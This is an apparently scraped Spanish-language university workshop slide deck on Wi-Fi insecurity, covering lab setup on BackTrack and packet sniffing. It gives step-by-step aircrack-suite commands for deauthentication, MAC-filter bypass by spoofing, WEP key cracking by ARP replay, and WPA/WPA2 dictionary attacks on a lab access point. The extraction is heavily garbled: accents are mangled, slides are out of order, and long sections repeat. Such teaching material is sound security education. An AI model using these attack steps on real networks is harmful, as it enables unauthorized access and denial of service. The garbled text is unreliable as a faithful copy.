httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
